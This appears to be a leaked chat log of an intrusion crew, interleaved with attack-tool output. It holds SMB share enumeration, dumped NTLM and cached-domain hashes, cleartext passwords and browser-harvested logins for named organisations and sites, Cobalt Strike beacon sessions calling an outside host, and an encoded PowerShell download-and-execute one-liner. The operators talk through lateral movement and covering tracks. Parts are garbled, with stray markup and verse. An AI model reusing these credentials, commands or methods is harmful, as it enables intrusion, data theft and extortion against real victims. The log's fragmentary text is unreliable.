Shares for TANNERFLANIGAN:
	[--- Unreadable Shares ---]
		IPC$
		NPI602973 (HP LaserJet 400 M401dne)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for MICSERVICE190:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08041910193:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08041911192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for MICPARTS190:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08041912198:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08041912195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for DESKTOP-0BOG84E:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for TOMA:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W0080419BERNIE:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for TROFFICE:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$
Shares for W08041912197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ F$ G$
Shares for W08041911191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for CARPARTS190:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for DESKTOP-GAYLEN:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CARSERVICE191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CARSERVICE160:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for DESKTOP-UA05NRF:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for MARVGOTTFRIED:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for DESKTOP-4Q14G11:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CARSERVICE180:
	[--- Unreadable Shares ---]
		IPC$
		TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W088726111912:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for CANDISOFFICE:
	[--- Unreadable Shares ---]
		IPC$
		Nics
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08872611192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W088726121912:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$.
Shares for JASONS-HP:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for DEVSERVICE6:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726111913:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for NDLEADING-SHOP1:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872611191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W088726111910:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W088726121910:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872611197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872612192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121928:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121929:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121911:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121932:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872612191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121931:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872611193:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872612193:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08987712191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121935:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726111915:
	[--- Unreadable Shares ---]
		IPC$
		Upstairs Printer
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08872612195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872610195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872612196:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726111914:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872610192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08872612197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121945:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08987711197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872611194:
	[--- Unreadable Shares ---]
		IPC$
		nic
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W0887260319CP:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W0987711195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08872612199:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W080332420B:
	[--- Unreadable Shares ---]
		IPC$
		Nic's Printer
		Upstairs MFP M477 PCL 6
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$ Users
Shares for W088726111911:
	[--- Unreadable Shares ---]
		IPC$
		tech library
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08987711194:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W0887261216KO:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ E$ print$
Shares for W08987712192:
	[--- Unreadable Shares ---]
		HP LaserJet Pro MFP M426f-M427f PCL-6
		IPC$
		MS Publisher Color Printer
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$
Shares for W08987711193:
	[--- Unreadable Shares ---]
		IPC$
		TJ New HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W088726121925:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08987710193:
	[--- Unreadable Shares ---]
		IPC$
		TJ NEW PRINTER HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08987711192:
	[--- Unreadable Shares ---]
		IPC$
		NPI02DE8A (HP LaserJet 400 M401dne)
		TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W088726121926:
	[--- Unreadable Shares ---]
		IPC$
		Nic's Printer
		Upstairs MFP M477 PCL 6
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$ Users
Shares for W088726111916:
	[--- Unreadable Shares ---]
		IPC$
		tech library
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08987711191:
	[--- Unreadable Shares ---]
		dominics
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for DESKTOP-CGJQ23A:
	[--- Unreadable Shares ---]
		G$
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for WILMA:
	[--- Unreadable Shares ---]
		I$
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ G$
Shares for DESKTOP-GCPB49A:
	[--- Unreadable Shares ---]
		D$
		IPC$
		NPI7CF108 (HP Color LaserJet MFP M477fdw)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for NDDEVSPARETECH1:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$

Potential targets in NDLEADING unlikely of course, they changed passwords YES on 21-22 and there are only two check this one in LA
but check this password on other L.A.C.s
TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012:::      ---- carrington123
``there's a shitload of linuxes we could get into and where is 445[ ](https://mediaeveryone.com/group/snpartners-com?msg=ZGwALMCyRJQGLoJYk) open and there are only 10 npc in it? all within one oushka and no access there and 1 server one we see 3 user subnets and we can go anywhere there on the server subnet did you check where? first two no, third user8 I think I checked and it doesn't work either
and 4 do not remember check if they do not open us new cars?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee:::
jason:1002:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
LEADMIN:1004:aad3b435b51404eeaad3b435b51404ee:dbc1746c544b6621dba9fa0a1eeb7fdf:::
TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012:::
``one domain microadministrator seems to have one and you didn't take off the clear pass? right, we rem sap has different passammmms la
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee:::
jason:1002:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
LEADMIN:1004:aad3b435b51404eeaad3b435b51404ee:dbc1746c544b6621dba9fa0a1eeb7fdf:::
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:5ce89fa1e9148477eb5d6aa455c2d494:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:0a564fe23c310f2850166ee68647928f:::
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:e4205612428e614cda5b5f82a6346771:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:e998f2240a4dce990f99bcfccd7f3d9c:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:c41814b44449d1944c1ef51a80384d36:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:e8e7a6d162f5dbde58a9065a44140834:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:1c0bbc2448c9d2fdf45389c83cdc124f:::
TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012:::
``We found yesterday that the servers (not DK) have the same LA, but we haven't been able to unroot yet
```
SMB 172.31.190.66 445 JDOCHSVC12 500: JDOCHSVC12\ZEUS (SidTypeUser)
SMB 172.31.190.66 445 JDOCHSVC12 501: JDOCHSVC12\_guest (SidTypeUser)
SMB 172.31.190.66 445 JDOCHSVC12 513: JDOCHSVC12\None (SidTypeGroup)
SMB 172.31.190.66 445 JDOCHSVC12 1000: JDOCHSVC12\WinRMRemoteWMIUsers__ (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1002: JDOCHSVC12\Direct Access Users (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1004: JDOCHSVC12\Anonymous (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1005: JDOCHSVC12\Message Capture Users (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1007: JDOCHSVC12\CtxAppVCOMAdmin (SidTypeUser)

```
```
SMB 172.31.190.17 445 JDODHCP02 [+] Brute forcing RIDs
SMB 172.31.190.17 445 JDODHCP02 500: JDODHCP02\ZEUS (SidTypeUser)
SMB 172.31.190.17 445 JDODHCP02 501: JDODHCP02\_guest (SidTypeUser)
SMB 172.31.190.17 445 JDODHCP02 503: JDODHCP02\DefaultAccount (SidTypeUser)
SMB 172.31.190.17 445 JDODHCP02 513: JDODHCP02\None (SidTypeGroup)
SMB 172.31.190.17 445 JDODHCP02 1000: JDODHCP02\DHCP Users (SidTypeAlias)
SMB 172.31.190.17 445 JDODHCP02 1001: JDODHCP02\DHCP Administrators (SidTypeAlias)
SMB 172.31.190.17 445 JDODHCP02 1002: JDODHCP02\Direct Access Users (SidTypeAlias)
user@user-tobefilledbyoem:~$ proxychains cme smb 10.99.194.151 -d jdossn -u nddevbernst -p Tractor20!
```
It looks something like this we'd love to)let's try to get in deeper and get a foothold there todayYes. They seem to be rebuilding the grid. There's new computers. I thought there was some progress, huh?
	 * Username : ndcartleich
	 * Domain : JDOSSN
	 * NTLM : ee0907810044b786f7b5504842161191
 
	 * Username : ndcarrtedro
	 * Domain : JDOSSN
	 * NTLM : c9e553f47018e2be97ec3307bd47df25
 
	 * Username : ndcarjjohns
	 * Domain : JDOSSN
	 * NTLM : ecb13250eceddc92b4f7f081f02f8685
 
	 * Username : ndcarjegger
	 * Domain : JDOSSN
	 * NTLM : ecb13250eceddc92b4f7f081f02f8685
 
	 * Username : ndcarhsherm
	 * Domain : JDOSSN
	 * NTLM : 0f1ffe1daf861353d1e2461538531635
 
	 * Username : ndcardkolst
	 * Domain : JDOSSN
	 * NTLM : b9b6aa1456c1a351844910877a487cf9
``````
	 * Username : ndmictflana
	 * Domain : JDOSSN
	 * NTLM : 7bba5ae0ee513a322b7cf6b8768bb063
Strange that all functions are affected I can not tell all by myself I will try to spawn from another user from another car)[ ](https://mediaeveryone.com/channel/general?msg=CNPm6wjaL5G2ftqAE) it as spawn did not help work through remotno I would try respawn try cmd substitute what rights to you?
beacon> spawn vew
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (hitark.com:443)
[+] host called home, sent: 840 bytes
[-] could not spawn C:\Windows\syswow64\wusa.exe: 740
Try to spawn a new session only one (on one server), nothing to move on all sessions? The same crap on execute-assembly... it doesn't matter what to run... I copied this piece from an attempt to run portcan[ ](https://mediaeveryone.com/channel/general?msg=ihcvpciBtarPTHnCD) this what for? why do you need this server?
```
[-] could not spawn C:\Windows\syswow64\wusa.exe: 740
[-] Could not connect to pipe: 2
``Check through rubeuswow on theoretically related servers ticketpngc - all the credentials are valid, but no one has rights. there are 21 cars on the network and they are servers. Inway is not catching anything yet. The impression is that they all work through RDP.  In addition, they seem to be all virtual machines (but not sure yet - I am checking) #pcsb-org
no access to neighboring domains
ports are being scanned, morphs are being checked for nasa and other things @user7 and i'm digging tvs what are your current tasks? for now what do you have to work with? are there any new networks coming today? hi:man_raising_hand:is the internet working? hi:space_invader:everyone hello!!!!``
RAJA-9298::ZOHOCORP:b3bd81e12761c973:76647c5c0cb37ce1c766147e15568b0b:010100000000000088fc2e71da91d6018a6e4cf93dbf74f500000000020006004c00410042000100100048004f00530054004e0041004d004500040012006c00610062002e006c006f00630061006c000300240068006f00730074006e0061006d0065002e006c00610062002e006c006f00630061006c00050012006c00610062002e006c006f00630061006c000700080088fc2e71da91d60106000400020000000800300030000000000000000100000000200000a2ccd58658f72e5537fd61255fea70627e2dcfe35c6d4c095f02c99ac2a92ad80a001000000000000000000000000000000000000900440048005400540050002f00720061006a0061002d0039003200390038002e006300730065007a002e007a006f0068006f0063006f007200700069006e002e0063006f006d000000000000000000:Niji@1302.
``We've set up a timeserver, let's try to pierce through it.
FortiClient -- The Security Fabric Agent
=======
ra-2ji1
``````
FortiClient -- The Security Fabric Agent
=======
rajanij132

``````
ManageEngine Password Manager Pro - Mozilla Firefox
=======
ampaso19
````WINONA\TOM abcabc4`https://vc1.rtpco.local/,https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local,10/22/2019 9:50:32 AM,13216229432847862,winona\tom,abcabc4````
--- Chromium Credential (User: TOM) ---
URL : http://home.rtpcompany.com/Account/LogOn
Username : winona\tom
Password : abcabc4

--- Chromium Credential (User: TOM) ---
URL : https://us.sso.covisint.com/sso
Username : tkoenig
Password : GreenTan123

--- Chromium Credential (User: TOM) ---
URL : https://us.sso.covisint.com/sso
Username : TKOENIG
Password : GreenTan123

--- Chromium Credential (User: TOM) ---
URL : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx
Username : tom
Password : Passw0rd!

--- Chromium Credential (User: TOM) ---
URL : https://www.myhealthevet.va.gov/mhv-portal-web/anonymous.portal
Username : tkoenig5
Password : xyzxyz8?

--- Chromium Credential (User: TOM) ---
URL : https://www.myhealth.va.gov/mhv-portal-web/home
Username : tkoenig5
Password : xyzxyz8?

--- Chromium Credential (User: TOM) ---
URL : https://mail.rtpcompany.com/Login.aspx
Username : tkoenig@rtpcompany.com
Password : PDLPDL7

--- Chromium Credential (User: TOM) ---
URL : http://hyperic.winona.rtpco.local:7080/j_spring_security_check
Username : hqadmin
Password : rtprtp1

[*] Finished Google Chrome extraction.

[*] Done.

````https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local `10.4.0.223 `https://vmwaremgr.winona.rtpco.local `How are you doing? Do you have time to close today? It's okay, we can distribute it quietly and make it in three trusts200 pcsWait, not much. and servers? I have not counted yet, about 2000 machines?
[DC] 'us alloyp'.
[DC] 'us.alloypolymers.com' will be the domain
[DC] 'GAHDC01.us.alloypolymers.com' will be the DC server
[DC] 'winona.rtpco.local' will be the user account
ERROR kull_m_rpc_drsr_CrackName ; CrackNames (name status): 0x00000002 (2) - ERROR_NOT_FOUND


$krb5tgs$23$*jerickson$rtpco.local$MSSQLSvc/Web4.winona.rtpco.local: Colorado04


``Till tomorrow)`` do you thank you, see you tomorrow)``Don't forget to clean up after yourself,`` Thank you all, good night)`` So, well, that's it. Today that's all, throw the session in the slip for 100 seconds +-, tomorrow we will continue) when trying to load a non-formed file writes an error (>4Gb) When you remove the ad info, remove the entire, all 6 files and download the same 6 files in the confab) Files over 50 meters are archived. Files over 200 mb in a compressed state are not downloaded through the cobaDon't forget to delete files created in the process of running commands! Today up to 12 daTo the second group alsoTry to work with her, maybe there faster copeIn the first group coba new session ``
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List with process highlighting
[*] Current Running PID: Yellow 892
[*] Explorer/Winlogon: BLUE
[*] Admin Tools: LIGHT BLUE
[*] Browsers: GREEN
[*] AV/EDR: RED
````.`[ ](https://mediaeveryone.com/channel/general?msg=3Dpt6nx8F2Yu9Km9o) .\[text\]\[text]\[qqq\]\[\url{https://katex.org/}\]sessions are gone༼ つ ◕_◕ ༽つ and what about the task?\{\a'\a'\underline{you yo piraka} doesn't work)\overgroup{Ingeborge Dapkunaite}{and how katya works\overgroup{Ingeborge Dapkunaite}?
 The mistakes of youth were easy to get away with.
Ah, youth, - the magic sound of a whistle.
We often sawed off the bough beneath us.
Now we are not the same, and the bitches have grown old.

``Thank you at the very bottom of the field``vfhrth`````

``````
right here)
`````'marker
123
007user1 - charmer, he has a message for me in a personal) + + in pm does not leave a message++All here? hahaI'm cheerfulGreat, who is not with us yet? Let them write in the slack works like everythinghttp://joxi.ru/D2PNv3QUJB5qNrI got a message, but to read it nowhereNo access to the PM we have the rights are cuthttp://joxi.ru/823GVzpTru/823GVzpT8a06L2+1 white screen with all white+also white screen can not? in slek otpisiteen not fit the passwords at 3hi not all can enter-no one came to personal messages? also white screenThere is nothing at all also the field for entering a message? I have a white background, no one personally with me does not open? user8[ ](https://mediaeveryone.com/channel/general?msg=2o2AnJQySQ6eGTJzD) on this, https://mediaeveryonecom/account/security - encryption E2E and reset the keyI can not write in person, please make me a human nickname Stalinnu me and the user is goodI do not understand what encryption password is required of me if you want uniqueness - nicknames in private) +++ got to open kmd but still could not pull in the cob, but managed to pull in ptsh, tomorrow will get all the information and will be untwisteddatax there's a flag -keep, when it gathersaablocks the session process kobydelka new not deleted whytomorrow by 3pick up, sessions in slipskoronu already 12takte guys you threw, no LA-parole not found the LA - admin and tsun-tsunetdo system does not risea, there vpn offu me in koba session what did not help?in tpsh did not fly? psh did not help? yes it's from here? a few pieces i threw out it ...? give me a screenshot of the lk without a VPN have anything to work with?
```
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx
```
ipn: Sage
i have no configs, i've tried everything manually, then i went through SauronEye, it's empty now i'll try it. i thought you were asking about arma or servda) fuck, you mean armitage ? only arma is available, i can't pull it there try to pull arma, win 10 now i'll try again in pts[ ](https://mediaeveryone.com/channel/general?msg=xAtkL5zvKkpzfAerN) and arma ?[ ](https://mediaeveryone.com/channel/general?msg=SpZYc5ZQE437xD8NP) that's my problem[ ](https://mediaeveryone.com/channel/general?msg=sFyr6iw2y3adPmDMa) this thing was on tasks@user7 you have what on tasks was before? still on the same - need to build dll then to mebug tpsh because of a socket chokeupuponovy stOoOw came as much as three times does not come into it either i read minds, or more details for the question what with ptsh?who needs to bild the shellcode to @user7@user7 was ready to volunteer not raised the sessionWhy? i need a volunteer can generate a new dll? i launch, the process hangs, but the session did not come dll? i can not draw in the coba and ptsh, kmd is closed but opened, does not let you run any exe file today till 12soglas, in the personal areaa did you order?) do not forget to make me an account in ptsh) check ipn and other things ``
beacon> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
这项请求将在域 WORKGROUP 的域控制器处理。

发生系统错误 1355。

指定的域不存在，或无法联系。

```
This request will be processed on the domain controller of the WORKGROUP domain.

There was a system error 1355.

The specified domain does not exist or cannot be contacted.
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes

``Domain is not responding there is a session in cobepop)`` on the external domain since they even have passwords repetition[ ](https://mediaeveryone.com/channel/general?msg=ShchebxkiSDtqpeN4) the internal one is the same?
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx

What domain did you have? Check if there is a pschhe I typoed or what? If it does not appear, then the socket server has failed and you will not have interactivethe bottom left of the window pops up sockets coopedd when logging in the pschhe who have not noticed the pricholbytnu thin or moderately delayed in 5 characters go or so it also dies?write with your hands and you don't copy it, it stops responding after trying to insert it try to run powershell.it doesn't respondkmda it doesn't write so in general tpsh domain pinged visible or dasgenerate a new onethispowershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AWABjAGMAMwBSAFAAawBVAGMATwBEAHIAegBiAGQAagBJAFAAaQBIAHYAcABMAHcAYwBRAFUAcgBjAHkASQB6AHUAbABkAHcARQBFAGUAYQAnACkAKQA7AA==то write with your hands if you don't copypaste the loadpaste what are you trying to do?but the load doesn't paste something[ ](https://mediaeveryone.com/channel/general?msg=agTv5YDd7WNBgFCha) i clicked and it's been 5 minutes since then3 item super-duperper? below enter?[ ](https://mediaeveryone.com/channel/general?msg=pDJmChgpTzunrmnaK) something on elfiskom if it didn't paste mb not copied3 top after enter+win10?on my car the pcm doesn't work in kmd call the menu on your axis and see what item you have pasted then open cmd on your car I don't think (P) just find out what's in it. notepad.exe >> file >> open >> C:\system32 >> cmd.exe >> pcm >> gcnp right here write back as done@user7 help kmd what's erp, oa? I put everything that was run analogues?
peptide*))8ethan.yu
peptide1*leon
leon20180928no access to directories, too. Of available only mozilla and some little things like Word and Isis.
no shells:thumbsup:@user8
```
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928
http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx mason peptide*))8
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928
http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx ethan.yu peptide1
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx dgs00318 peptide1*
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ethan.yu peptide1*

in this case there is something to work with) already told@user3 will tell us there is a variant of loading the script in the memory of the ps itself in the tpc file run is always disabled in fact i will try in the tpc import yet in problems - command, output already said i tried to import ps1 script by rd and run it
writes disabled by the admin what does it mean to disable import and run if tpsh arrives? at least i tried to rdp in ps to do itkst, there is a neuter smblogin for ps anyway check hit then most likely already going back timer)no well it's possible, but i think i already made a noise)and when you start to make noise will not come?)polzak is dead, no his files[ ](https://mediaeveryone.com/channel/general?msg=kkoPu7T8eonmEBDok) 1) psh on the rpd, you hold a session polzak and if he flies in and sees the open psh and stuff will be unpleasant
2) tpsh can scan hosts by hash, check git@tl1 i can use that dll you gave me yesterday ?@tl1 Give me a clean cryptor
devry.edu
```
Coba and arma are not attracted (in all likelihood some iron blocker traffic)
Attracted tpsh, but what's the point of it if I have rdp psh
attracted msf, raised the system on a virtual machine
tried to scan network, session with a route or forwarding almost immediately dies
Same with brute force on LA - roth and portfwd kill the session
Broot on LA, each time resetting session, there is LA only on the same virutals useless
ms17 kills it right away.
I'm in the middle of a stalemate, thank you@user7
```
https://ucfapps.cloud.com/citrix/storeweb/ je517380@ucf.edu Sawgrass20@

``@user4
```
https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!

``Create the group cpcc.edu I'm not there I'm not there all have tasks? hello everyone good evening. thanks. i'll read it) it's something like salted hashes and then some fuckers it says "brutte" but i must have brutted two for all time))))))))))) keep the articlettp://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-cheap ((it's mscachetvot such crap$DCC2$10240semeformat how to distinguish mscache2no more there are several cars, I want there too remove this wine10 and apparently without local admin is the option where else to poke?
it's a pain in the ass
they don't really fuckin' brute force anything
i seemscache2 it's the same ntlm only right
SMB 10.0.0.149 445 SCCY-17 SCCY\SCCY-17$:aad3b435b51404eeaad3b435b51404ee:8b90ea2112c039acd811d39829c113e6::
``there are different people saying they still need to brute force them?
```
https://security.stackexchange.com/questions/185546/using-windows-lsa-hashes-obtained-from-crackmapexec
you guys are so cool over there already impacked what's wrong? = i already asked you that, but i don't remember your answer.) What can be done with this
```
user@user-tobefilledbyoem:~$ proxychains cme smb 10.0.0.149 -d sccy -u qc -p secure4qc --lsa
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.14-git-25-g486f820
[proxychains] Strict chain ...  64.187.238.58:15452 ...  10.0.0.149:445 ...  OK
[proxychains] Strict chain...  64.187.238.58:15452 ...  10.0.0.149:445 ...  OK
[proxychains] Strict chain...  64.187.238.58:15452 ...  10.0.0.149:135 ...  OK
[proxychains] Strict chain...  64.187.238.58:15452 ...  10.0.0.149:445 ...  OK
[proxychains] Strict chain...  64.187.238.58:15452 ...  10.0.0.149:445 ...  OK
SMB 10.0.0.149 445 SCCY-17 [*] Windows 10.0 Build 18362 x64 (name:SCCY-17) (domain:sccy) (signing:False) (SMBv1:False)
[proxychains] Strict chain ...  64.187.238.58:15452 ...  10.0.0.149:445 ...  OK
SMB 10.0.0.149 445 SCCY-17 [+] sccy\qc:secure4qc (Pwn3d!)
SMB 10.0.0.149 445 SCCY-17 [+] Dumping LSA secrets
SMB 10.0.0.149 445 SCCY-17 SCCY.LOCAL/sccyadmin:$DCC2$10240#sccyadmin#a728094747305c7dae5c1df7caa58990f7
SMB 10.0.0.149 445 SCCY-17 SCCY.LOCAL/qc:$DCC2$10240#qc#581fe68b56105fa2d0f81fc6c1677a3e
SMB 10.0.0.149 445 SCCY-17 SCCY.LOCAL/VannData:$DCC2$10240#VannData#5887e1615dd11430d5f857c46873db55
SMB 10.0.0.149 445 SCCY-17 SCCY.LOCAL/vdsadmin:$DCC2$10240#vdsadmin#f38aff944fe0fcc6b6cccff4730347f0
SMB 10.0.0.149 445 SCCY-17 SCCY\SCCY-17$:aes256-cts-hmac-sha1-96:d7fe4cb1ed60be97f77eb13af45038454b0dcde43f310d1a1410c16d68c43155
SMB 10.0.0.149 445 SCCY-17 SCCY\SCCY-17$:aes128-cts-hmac-sha1-96:c556af40434f8a2f8913f4d38e05a3f2
SMB 10.0.0.149 445 SCCY-17 SCCY\SCCY-17$:des-cbc-md5:c8d3020e380d15c4
